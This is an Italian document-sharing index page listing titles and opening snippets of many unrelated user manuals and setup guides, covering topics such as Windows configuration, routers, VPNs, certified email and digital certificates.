VADEMECUM TECNICO. Per PC con sistema operativo Windows XP Windows Vista - Windows 7 VADEMECUM TECNICO Per PC con sistema operativo Windows XP Windows Vista - Windows 7 1) per poter operare in Server Farm bisogna installare dal cd predisposizione ambiente server farm i due file: setup.exe

Dettagli

Utilizzo della Intranet, forum privati Soci e Staff

Utilizzo della Intranet, forum privati Soci e Staff Utilizzo della Intranet, forum privati Soci e Staff Se durante la registrazione ad Associazioni Milano avete fatto richiesta del servizio denominato Intranet, questo sarà subito disponibile già a partire

Dettagli

Gestione Laboratorio: Manuale d uso per l utilizzo del servizio Windows di invio automatico di SMS

Gestione Laboratorio: Manuale d uso per l utilizzo del servizio Windows di invio automatico di SMS Gestione Laboratorio: Manuale d uso per l utilizzo del servizio Windows di invio automatico di SMS Sito Web: www.gestionelaboratorio.com Informazioni commerciali e di assistenza: info@gestionelaboratorio.com

Dettagli

PROGETTO PER LA TRASMISSIONE DOCUMENTI RELATIVI ALL APPROVAZIONE DELLE MANIFESTAZIONI IN FORMA DIGITALE

PROGETTO PER LA TRASMISSIONE DOCUMENTI RELATIVI ALL APPROVAZIONE DELLE MANIFESTAZIONI IN FORMA DIGITALE PROGETTO PER LA TRASMISSIONE DOCUMENTI RELATIVI ALL APPROVAZIONE DELLE MANIFESTAZIONI IN FORMA DIGITALE L approvazione di una manifestazione nazionale od internazionale comporta spesso la trasmissione

Dettagli

Banca dati Professioniste in rete per le P.A. Guida all uso per le Professioniste

Banca dati Professioniste in rete per le P.A. Guida all uso per le Professioniste Banca dati Professioniste in rete per le P.A. Guida all uso per le Professioniste versione 2.1 24/09/2015 aggiornamenti: 23-set-2015; 24-set-2015 Autore: Francesco Brunetta (http://www.francescobrunetta.it/)

Dettagli

COMUNICAZIONE UTENTI SISTEMI-PROFIS INSTALLAZIONE GE.RI.CO. 2015 e PARAMETRI2015

COMUNICAZIONE UTENTI SISTEMI-PROFIS INSTALLAZIONE GE.RI.CO. 2015 e PARAMETRI2015 COMUNICAZIONE UTENTI SISTEMI-PROFIS INSTALLAZIONE GE.RI.CO. 2015 e PARAMETRI2015 Vicenza, 3 giugno 2015 Gentile cliente, si ricorda che a partire dall aggiornamento PROFIS 2011.1 è stato automatizzato

Dettagli

Guida alla registrazione on-line di un DataLogger

Guida alla registrazione on-line di un DataLogger NovaProject s.r.l. Guida alla registrazione on-line di un DataLogger Revisione 3.0 3/08/2010 Partita IVA / Codice Fiscale: 03034090542 pag. 1 di 17 Contenuti Il presente documento è una guida all accesso

Dettagli

Manuale LiveBox WEB ADMIN. http://www.liveboxcloud.com

Manuale LiveBox WEB ADMIN. http://www.liveboxcloud.com 2014 Manuale LiveBox WEB ADMIN http://www.liveboxcloud.com LiveBox Srl non rilascia dichiarazioni o garanzie in merito al contenuto o uso di questa documentazione e declina qualsiasi garanzia espressa

Dettagli

Gui Gu d i a d ra r p a i p d i a V d o a d f a one Int fone In e t r e net rnet Box Key Mini

Gui Gu d i a d ra r p a i p d i a V d o a d f a one Int fone In e t r e net rnet Box Key Mini Guida rapida Vodafone Internet Key Box Mini Ideato per Vodafone QSG_VMCLite_v31_10-2007_e172_IT.1 1 10/10/07 14:39:10 QSG_VMCLite_v31_10-2007_e172_IT.2 2 10/10/07 14:39:11 Benvenuti nel mondo della connessione

Dettagli

La VPN con il FRITZ!Box Parte I. La VPN con il FRITZ!Box Parte I

La VPN con il FRITZ!Box Parte I. La VPN con il FRITZ!Box Parte I La VPN con il FRITZ!Box Parte I 1 Descrizione Ogni utente di Internet può scambiare dati ed informazioni con qualunque altro utente della rete. I dati scambiati viaggiano nella nuvola attraverso una serie

Dettagli

Progetto Istanze On Line

Progetto Istanze On Line 2009 Progetto Istanze On Line 20 marzo 2009 INDICE 1 INTRODUZIONE ALL USO DELLA GUIDA...3 1.1 SIMBOLI USATI E DESCRIZIONI...3 2 GESTIONE DELL UTENZA...4 2.1 COS È E A CHI È RIVOLTO...4 2.2 NORMATIVA DI

Dettagli

Assegnamento di un indirizzo IP temporaneo a dispositivi Barix

Assegnamento di un indirizzo IP temporaneo a dispositivi Barix Assegnamento di un indirizzo IP temporaneo a dispositivi Barix V 1.0 GUIDA RAPIDA Introduzione L obiettivo di questa guida rapida è fornire all utente un modo per poter assegnare un indirizzo IP temporaneo

Dettagli

Impostare il browser per navigare in sicurezza Opzioni di protezione

Impostare il browser per navigare in sicurezza Opzioni di protezione Impostare il browser per navigare in sicurezza Opzioni di protezione Data la crescente necessità di sicurezza e tutela dei propri dati durante la navigazione in rete, anche gli stessi browser si sono aggiornati,

Dettagli

MANUALE UTENTE Fiscali Free

MANUALE UTENTE Fiscali Free MANUALE UTENTE Fiscali Free Le informazioni contenute in questa pubblicazione sono soggette a modifiche da parte della ComputerNetRimini. Il software descritto in questa pubblicazione viene rilasciato

Dettagli

GUIDA DI INSTALLAZIONE E PRIMA CONFIGURAZIONE DI EDILCONNECT PER I CONSULENTI

GUIDA DI INSTALLAZIONE E PRIMA CONFIGURAZIONE DI EDILCONNECT PER I CONSULENTI 1 GUIDA DI INSTALLAZIONE E PRIMA CONFIGURAZIONE DI EDILCONNECT PER I CONSULENTI Introduzione Dal 24 ottobre è possibile per i consulenti effettuare l installazione e la configurazione del nuovo applicativo

Dettagli

D R O P B O X COS È DROPBOX:

D R O P B O X COS È DROPBOX: D R O P B O X COS È DROPBOX: Dropbox è un applicazione per computer e ipad di condivisione e salvataggio files in un ambiente internet. Consiste fondamentalmente in un disco di rete, utilizzabile da più

Dettagli

ISTRUZIONI PER L INVIO TRAMITE PEC (POSTA ELETTRONICA CERTIFICATA) DI ISTANZE, COMUNICAZIONI E DOCUMENTI

ISTRUZIONI PER L INVIO TRAMITE PEC (POSTA ELETTRONICA CERTIFICATA) DI ISTANZE, COMUNICAZIONI E DOCUMENTI ISTRUZIONI PER L INVIO TRAMITE PEC (POSTA ELETTRONICA CERTIFICATA) DI ISTANZE, COMUNICAZIONI E DOCUMENTI Firenze, mercoledì 10 Maggio 2011 VERSIONE 1.2 DEL 10 Maggio2011 Pagina 2 di 8 In queste pagine

Dettagli

Manuale LiveBox APPLICAZIONE IOS. http://www.liveboxcloud.com

Manuale LiveBox APPLICAZIONE IOS. http://www.liveboxcloud.com 2014 Manuale LiveBox APPLICAZIONE IOS http://www.liveboxcloud.com LiveBox Srl non rilascia dichiarazioni o garanzie in merito al contenuto o uso di questa documentazione e declina qualsiasi garanzia espressa

Dettagli

Domande e risposte su Avira ProActiv Community

Domande e risposte su Avira ProActiv Community Domande e risposte su Avira ProActiv Community Avira AntiVir versione 10 sfrutta un innovativa tecnologia protettiva cloud-based, denominata ProActiv, che identifica e blocca i nuovi virus non appena questi

Dettagli

Quick Reference Giornale di Bordo (e-logbook)

Quick Reference Giornale di Bordo (e-logbook) Quick Reference Giornale di Bordo (e-logbook) L applicativo Giornale di Bordo (e-logbook) è stato realizzato per gli operatori marittimi con l obiettivo di fornire un strumento per la compilazione e la

Dettagli

Ti consente di ricevere velocemente tutte le informazioni inviate dal personale, in maniera assolutamente puntuale, controllata ed organizzata.

Ti consente di ricevere velocemente tutte le informazioni inviate dal personale, in maniera assolutamente puntuale, controllata ed organizzata. Sommario A cosa serve InfoWEB?... 3 Quali informazioni posso comunicare o ricevere?... 3 Cosa significa visualizzare le informazioni in maniera differenziata in base al livello dell utente?... 4 Cosa significa

Dettagli

Windows XP Istruzioni rete wired per portatili v1.0

Windows XP Istruzioni rete wired per portatili v1.0 Istruzioni rete wired per portatili v1.0 Pagina 1 di 13 Istruzioni rete wired per portatili v1.0 Istruzioni per 1 Introduzione Per seguire le istruzioni qui proposte è necessario utilizzare le utility

Dettagli

Il calendario di Windows Vista

Il calendario di Windows Vista Il calendario di Windows Vista Una delle novità introdotte in Windows Vista è il Calendario di Windows, un programma utilissimo per la gestione degli appuntamenti, delle ricorrenze e delle attività lavorative

Dettagli

MyFRITZ!, Dynamic DNS e Accesso Remoto

MyFRITZ!, Dynamic DNS e Accesso Remoto MyFRITZ!, Dynamic DNS e Accesso Remoto 1 Introduzione In questa mini-guida illustreremo come accedere da Internet al vostro FRITZ!Box in ufficio o a casa, quando siete in mobilità o vi trovate in luogo

Dettagli

RICEZIONE AUTOMATICA DEI CERTIFICATI DI MALATTIA 1.1. MALATTIE GESTIONE IMPORT AUTOMATICO 1.2. ATTIVAZIONE DELLA RICEZIONE DEL FILE CON L INPS

RICEZIONE AUTOMATICA DEI CERTIFICATI DI MALATTIA 1.1. MALATTIE GESTIONE IMPORT AUTOMATICO 1.2. ATTIVAZIONE DELLA RICEZIONE DEL FILE CON L INPS RICEZIONE AUTOMATICA DEI CERTIFICATI DI MALATTIA 1.1. MALATTIE GESTIONE IMPORT AUTOMATICO Abbiamo predisposto il programma di studio Web per la ricezione automatica dei certificati di malattia direttamente

Dettagli

MANUALE UTENTE. Computer Palmare WORKABOUT PRO

MANUALE UTENTE. Computer Palmare WORKABOUT PRO MANUALE UTENTE Computer Palmare WORKABOUT PRO INDICE PROCEDURA DI INSTALLAZIONE:...3 GUIDA ALL UTILIZZO:...12 PROCEDURA DI AGGIORNAMENTO:...21 2 PROCEDURA DI INSTALLAZIONE: Per il corretto funzionamento

Dettagli

IRSplit. Istruzioni d uso 07/10-01 PC

IRSplit. Istruzioni d uso 07/10-01 PC 3456 IRSplit Istruzioni d uso 07/10-01 PC 2 IRSplit Istruzioni d uso Indice 1. Requisiti Hardware e Software 4 1.1 Requisiti Hardware 4 1.2 Requisiti Software 4 2. Installazione 4 3. Concetti fondamentali

Dettagli

NAVIGAORA HOTSPOT. Manuale utente per la configurazione

NAVIGAORA HOTSPOT. Manuale utente per la configurazione NAVIGAORA HOTSPOT Manuale utente per la configurazione NAVIGAORA Hotspot è l innovativo servizio che offre ai suoi clienti accesso ad Internet gratuito, in modo semplice e veloce, grazie al collegamento

Dettagli

Light CRM. Documento Tecnico. Descrizione delle funzionalità del servizio

Light CRM. Documento Tecnico. Descrizione delle funzionalità del servizio Documento Tecnico Light CRM Descrizione delle funzionalità del servizio Prosa S.r.l. - www.prosa.com Versione documento: 1, del 11 Luglio 2006. Redatto da: Michela Michielan, michielan@prosa.com Revisionato

Dettagli

PORTALE CLIENTI Manuale utente

PORTALE CLIENTI Manuale utente PORTALE CLIENTI Manuale utente Sommario 1. Accesso al portale 2. Home Page e login 3. Area riservata 4. Pagina dettaglio procedura 5. Pagina dettaglio programma 6. Installazione dei programmi Sistema operativo

Dettagli

REVISIONI. 1.0 07 ottobre 2010 RTI Prima stesura

REVISIONI. 1.0 07 ottobre 2010 RTI Prima stesura Data: 07 ottobre 2010 Redatto da: RTI REVISIONI Rev. Data Redatto da Descrizione/Commenti 1.0 07 ottobre 2010 RTI Prima stesura Si precisa che la seguente procedura necessita, nel computer con il quale

Dettagli

Servizi Remoti. Servizi Remoti. TeamPortal Servizi Remoti

Servizi Remoti. Servizi Remoti. TeamPortal Servizi Remoti 20120300 INDICE 1. Introduzione... 3 2. Consultazione... 4 2.1 Consultazione Server Fidati... 4 2.2 Consultazione Servizi Client... 5 2.3 Consultazione Stato richieste... 5 3. Amministrazione... 6 3.1

Dettagli

MANUALE DI UTILIZZO: INTRANET PROVINCIA DI POTENZA

MANUALE DI UTILIZZO: INTRANET PROVINCIA DI POTENZA MANUALE DI UTILIZZO: INTRANET PROVINCIA DI POTENZA Fornitore: Publisys Prodotto: Intranet Provincia di Potenza http://www.provincia.potenza.it/intranet Indice 1. Introduzione... 3 2. I servizi dell Intranet...

Dettagli

PROCEDURE DI FIRMA PER I PIP PRESENTATI NEI BANDI APPRENDISTATO

PROCEDURE DI FIRMA PER I PIP PRESENTATI NEI BANDI APPRENDISTATO PROCEDURE DI FIRMA PER I PIP PRESENTATI NEI BANDI APPRENDISTATO 1 - INTRODUZIONE Scopo del presente documento è descrivere le procedure attuabili per la firma dei PIP presentati nei bandi apprendistato

Dettagli

CONTROLLO DI GESTIONE DELLO STUDIO

CONTROLLO DI GESTIONE DELLO STUDIO CONTROLLO DI GESTIONE DELLO STUDIO Con il controllo di gestione dello studio il commercialista può meglio controllare le attività svolte dai propri collaboratori dello studio nei confronti dei clienti

Dettagli

Manuale NetSupport v.10.70.6 Liceo G. Cotta Marco Bolzon

Manuale NetSupport v.10.70.6 Liceo G. Cotta Marco Bolzon NOTE PRELIMINARI: 1. La versione analizzata è quella del laboratorio beta della sede S. Davide di Porto, ma il programma è presente anche nel laboratorio alfa (Porto) e nel laboratorio di informatica della

Dettagli

SPORTELLO UNICO DELLE ATTIVITÀ PRODUTTIVE MANUALE OPERATIVO FUNZIONI DI PAGAMENTO ONLINE. Versione 05

SPORTELLO UNICO DELLE ATTIVITÀ PRODUTTIVE MANUALE OPERATIVO FUNZIONI DI PAGAMENTO ONLINE. Versione 05 SPORTELLO UNICO DELLE ATTIVITÀ PRODUTTIVE MANUALE OPERATIVO FUNZIONI DI PAGAMENTO ONLINE Versione 05 Novembre 2015 1 Sommario Generalità... 3 Pagare con ICONTO... 7 Pagare con carta di credito... 10 Pagare

Dettagli

E-Post Office Manuale utente

E-Post Office Manuale utente E-Post Office Manuale utente Versione V01.07 Edizione luglio 2014 1 Indice 1 Descrizione del servizio 3 2 Il portale di E-Post Office 4 2.1 Menu di navigazione 4 2.2 Swiss Post Box 4 2.3 Archiviazione

Dettagli

Guida alla registrazione on-line di un NovaSun Log

Guida alla registrazione on-line di un NovaSun Log Guida alla registrazione on-line di un NovaSun Log Revisione 4.1 23/04/2012 pag. 1 di 16 Contenuti Il presente documento è una guida all accesso e all utilizzo del pannello di controllo web dell area clienti

Dettagli

Come configurare l accesso ad Internet con il tuo telefonino GPRS EDGE* UMTS* (Sistema Operativi Microsoft Win95 e Win98).

Come configurare l accesso ad Internet con il tuo telefonino GPRS EDGE* UMTS* (Sistema Operativi Microsoft Win95 e Win98). Come configurare l accesso ad Internet con il tuo telefonino GPRS EDGE* UMTS* (Sistema Operativi Microsoft Win95 e Win98). OPERAZIONI PRELIMINARI Registrati gratuitamente al servizio I-BOX: qualora non

Dettagli

knfbreader Mobile kreader Mobile

knfbreader Mobile kreader Mobile knfbreader Mobile kreader Mobile Istruzioni di installazione Copyright 2009 knfb Reading Technology, Inc. www.knfbreader.eu Tutti i diritti riservati. Altri nomi di ditte o prodotti sono marchi o marchi

Dettagli

DINAMIC: gestione assistenza tecnica

DINAMIC: gestione assistenza tecnica DINAMIC: gestione assistenza tecnica INSTALLAZIONE SU SINGOLA POSTAZIONE DI LAVORO PER SISTEMI WINDOWS 1. Installazione del software Il file per l installazione del programma è: WEBDIN32.EXE e può essere

Dettagli

PROGRAMMA GESTIONE TURNI MANUALE UTENTE. Programma Gestione Turni Manuale Utente versione 1.1

PROGRAMMA GESTIONE TURNI MANUALE UTENTE. Programma Gestione Turni Manuale Utente versione 1.1 PROGRAMMA GESTIONE TURNI MANUALE UTENTE INDICE 1 PREMESSA 3 2 COMANDI COMUNI 3 3 SEDI 3 4 FESTIVITÀ 4 5 PERIODI TURNI 4 6 COD. TURNI 6 7 TURNI SPORTIVI 9 8 COD. EQUIPAGGI 9 9 DISPONIBILITÀ 10 10 INDISPONIBILITÀ

Dettagli

CERTIFICATI DIGITALI. Manuale Utente

CERTIFICATI DIGITALI. Manuale Utente CERTIFICATI DIGITALI Procedure di installazione, rimozione, archiviazione Manuale Utente versione 1.0 pag. 1 pag. 2 di30 Sommario CERTIFICATI DIGITALI...1 Manuale Utente...1 Sommario...2 Introduzione...3

Dettagli

1. Compilazione dell istanza di adesione

1. Compilazione dell istanza di adesione 1. Compilazione dell istanza di adesione Compilare l istanza di adesione dal sito dell Agenzia delle Dogane avendo cura di stampare il modulo compilato. In questa fase è necessario comunicare se si è in

Dettagli

SendMedMalattia v. 1.0. Manuale d uso

SendMedMalattia v. 1.0. Manuale d uso 2 SendMedMalattia v. 1.0 Pagina 1 di 25 I n d i c e 1) Introduzione...3 2) Installazione...4 3) Prima dell avvio di SendMedMalattia...9 4) Primo Avvio: Inserimento dei dati del Medico di famiglia...11

Dettagli

Contenuto del pacchetto

Contenuto del pacchetto Contenuto del pacchetto DWL-900AP Trasformatore AC Cavo USB CD d installazione Manuale utente Manuale rapido d installazione Se uno o più componenti dovessero risultare mancanti o danneggiati, contattare

Dettagli

MANUALE UTENTE. TeamPortal Liste Distribuzioni 20120100

MANUALE UTENTE. TeamPortal Liste Distribuzioni 20120100 MANUALE UTENTE 20120100 INDICE Introduzione... 3 1 - Messaggi... 4 1.1 Creazione / Modifca Email... 6 1.2 Creazione / Modifca Sms... 8 2 -Liste... 10 3 Gruppi Liste... 15 4 Tipi Messaggi... 17 5 Amministrazione...

Dettagli

1. Il Client Skype for Business

1. Il Client Skype for Business 1. Il Client Skype for Business 2. Configurare una Periferica Audio 3. Personalizzare una Periferica Audio 4. Gestire gli Stati di Presenza 5. Tabella Stati di Presenza 6. Iniziare una Chiamata 7. Iniziare

Dettagli

Manuale d'uso del Connection Manager

Manuale d'uso del Connection Manager Manuale d'uso del Connection Manager Edizione 1.0 2 Indice Informazioni sull'applicazione Gestione connessioni 3 Operazioni preliminari 3 Aprire l'applicazione Gestione connessioni 3 Visualizzare lo stato

Dettagli

GUIDA ALL UTILIZZO DEL PROGRAMMA TUTTORIFIUTI PER L ACCESSO AUTENTICATO AL PORTALE WEB WWW.TUTTORIFIUTI.IT

GUIDA ALL UTILIZZO DEL PROGRAMMA TUTTORIFIUTI PER L ACCESSO AUTENTICATO AL PORTALE WEB WWW.TUTTORIFIUTI.IT GUIDA ALL UTILIZZO DEL PROGRAMMA TUTTORIFIUTI PER L ACCESSO AUTENTICATO AL PORTALE WEB WWW.TUTTORIFIUTI.IT Versione 1.0 Per assistenza tecnica e per qualsiasi informazione contattare il Numero Verde 1

Dettagli

Guida alla compilazione on-line delle domande di Dote Scuola A.S. 2013-2014 - per le Famiglie INDICE

Guida alla compilazione on-line delle domande di Dote Scuola A.S. 2013-2014 - per le Famiglie INDICE Guida alla compilazione on-line delle domande di Dote Scuola A.S. 2013-2014 - per le Famiglie INDICE Introduzione... 2 Riconoscimento del soggetto richiedente da parte del sistema... 2 Elenco dei servizi

Dettagli

Con accesso remoto s'intende la possibilità di accedere ad uno o più Personal Computer con un modem ed una linea telefonica.

Con accesso remoto s'intende la possibilità di accedere ad uno o più Personal Computer con un modem ed una linea telefonica. Tecnologie informatiche ACCESSO REMOTO CON WINDOWS Con accesso remoto s'intende la possibilità di accedere ad uno o più Personal Computer con un modem ed una linea telefonica. Un esempio di tale servizio

Dettagli

GUIDA ALLA GESTIONE DEI TICKET REV. 1. guida_gestione_tck_rev1.doc - 1 di 9

GUIDA ALLA GESTIONE DEI TICKET REV. 1. guida_gestione_tck_rev1.doc - 1 di 9 GUIDA ALLA GESTIONE DEI TICKET REV. 1 guida_gestione_tck_rev1.doc - 1 di 9 INTRODUZIONE Dopo aver utilizzato internamente per alcuni anni il nostro software di Ticketing, abbiamo deciso di metterlo a disposizione

Dettagli

Cos è ND Rifiuti 2008?

Cos è ND Rifiuti 2008? ND - Rifiuti 2008 Software per intermediari Controllo di gestione Amministrazione Scadenzario Gestione documenti Creazione modello MUD Stampa registro di carico / scarico Cos è ND Rifiuti 2008? ND - Rifiuti

Dettagli

Titolare del trattamento dei dati innanzi descritto è tsnpalombara.it

Titolare del trattamento dei dati innanzi descritto è tsnpalombara.it Decreto Legislativo 196/2003 Codice in materia di protezione dei dati personali COOKIE POLICY La presente informativa è resa anche ai sensi dell art. 13 del D.Lgs 196/03 Codice in materia di protezione

Dettagli

Guida rapida alla Webconferencing

Guida rapida alla Webconferencing Guida rapida alla Webconferencing Questa Guida rapida illustra le operazioni più frequenti nell utilizzo di MeetIn Web. In particolare: Eseguire il settaggio iniziale di dispositivi audio e video Connettersi

Dettagli

Manuale servizio SMTP autenticato

Manuale servizio SMTP autenticato Manuale servizio SMTP autenticato Introduzione ai protocolli di invio della posta elettronica... 2 SMTP... 2 Crittografia... 2 Outlook Express... 3 Attivazione della crittografia... 5 Outlook 2003... 6

Dettagli

INDICE. IL CENTRO ATTIVITÀ... 3 I MODULI... 6 IL MY CLOUD ANASTASIS... 8 Il menu IMPORTA... 8 I COMANDI DEL DOCUMENTO...

INDICE. IL CENTRO ATTIVITÀ... 3 I MODULI... 6 IL MY CLOUD ANASTASIS... 8 Il menu IMPORTA... 8 I COMANDI DEL DOCUMENTO... MANCA COPERTINA INDICE IL CENTRO ATTIVITÀ... 3 I MODULI... 6 IL MY CLOUD ANASTASIS... 8 Il menu IMPORTA... 8 I COMANDI DEL DOCUMENTO... 12 I marchi registrati sono proprietà dei rispettivi detentori. Bologna

Dettagli

GUIDA RAPIDA. Per navigare in Internet, leggere ed inviare le mail con il tuo nuovo prodotto TIM

GUIDA RAPIDA. Per navigare in Internet, leggere ed inviare le mail con il tuo nuovo prodotto TIM GUIDA RAPIDA Per navigare in Internet, leggere ed inviare le mail con il tuo nuovo prodotto TIM Indice Gentile Cliente, Guida Rapida 1 CONFIGURAZIONE DEL COMPUTER PER NAVIGARE IN INTERNET CON PC CARD/USB

Dettagli

CORSO DI FORMAZIONE PER L'ACCESSO AI LABORATORI DELL'ATENEO COMPILAZIONE SCHEDA DI ACCESSO

CORSO DI FORMAZIONE PER L'ACCESSO AI LABORATORI DELL'ATENEO COMPILAZIONE SCHEDA DI ACCESSO SERVIZIO FORMAZIONE E SVILUPPO R. U. CORSO DI FORMAZIONE PER L'ACCESSO AI LABORATORI DELL'ATENEO Guida per i frequentatori dei laboratori Per ogni frequentatore che deve accedere ai laboratori di Ateneo

Dettagli

Metti il GPS sul cellulare Nokia

Metti il GPS sul cellulare Nokia Metti il GPS sul cellulare Nokia Dopo alcuni anni di onorato servizio, Nokia ha deciso di mandare in pensione il suo software di gestione per cellulari, la famosa PC Suite, aggiornandola con il nuovo pacchetto

Dettagli

PostaCertificat@ Concessione del servizio di comunicazione elettronica certificata tra pubblica amministrazione e cittadino- PostaCertificat@

PostaCertificat@ Concessione del servizio di comunicazione elettronica certificata tra pubblica amministrazione e cittadino- PostaCertificat@ PostaCertificat@ Postecom S.p.A. Poste Italiane S.p.A. Telecom Italia S.p.A. Pag. 1/5 LA SICUREZZA DEL SERVIZIO PostaCertificat@ Limitazione delle comunicazioni - il servizio di comunicazione PostaCertificat@

Dettagli

Istruzioni operative instal azione FirmaVerifica3.0 Pag.1 di 27

Istruzioni operative instal azione FirmaVerifica3.0 Pag.1 di 27 Istruzioni operative installazione FirmaVerifica3.0 Pag.1 di 27 Generalità... 3 Operazioni preliminari... 4 Requisiti tecnici... 5 Installazione applicazione...6 Visualizzazione fornitura... 14 Gestione

Dettagli

CTVClient. Dopo aver inserito correttamente i dati, verrà visualizzata la schermata del tabellone con i giorni e le ore.

CTVClient. Dopo aver inserito correttamente i dati, verrà visualizzata la schermata del tabellone con i giorni e le ore. CTVClient Il CTVClient è un programma per sistemi operativi Windows che permette la consultazione e la prenotazione delle ore dal tabellone elettronico del Circolo Tennis Valbisenzio. Per utilizzarlo è

Dettagli

Invio SMS. DM Board ICS Invio SMS

Invio SMS. DM Board ICS Invio SMS Invio SMS In questo programma proveremo ad inviare un SMS ad ogni pressione di uno dei 2 tasti della DM Board ICS. Per prima cosa creiamo un nuovo progetto premendo sul pulsante (Create new project): dove

Dettagli

REOL-Services Quick Reference Ver. 1.1 Tecno Press Srl. 1

REOL-Services Quick Reference Ver. 1.1 Tecno Press Srl. 1 In questa semplice guida sono riportate tutte le informazioni relative alla prima registrazione e quelle relative alla configurazione dell ambiente di lavoro per poter utilizzare al meglio la nostra suite

Dettagli

Gestione delle informazioni necessarie all attività di validazione degli studi di settore. Trasmissione degli esempi da valutare.

Gestione delle informazioni necessarie all attività di validazione degli studi di settore. Trasmissione degli esempi da valutare. Gestione delle informazioni necessarie all attività di validazione degli studi di settore. Trasmissione degli esempi da valutare. E stato previsto l utilizzo di uno specifico prodotto informatico (denominato

Dettagli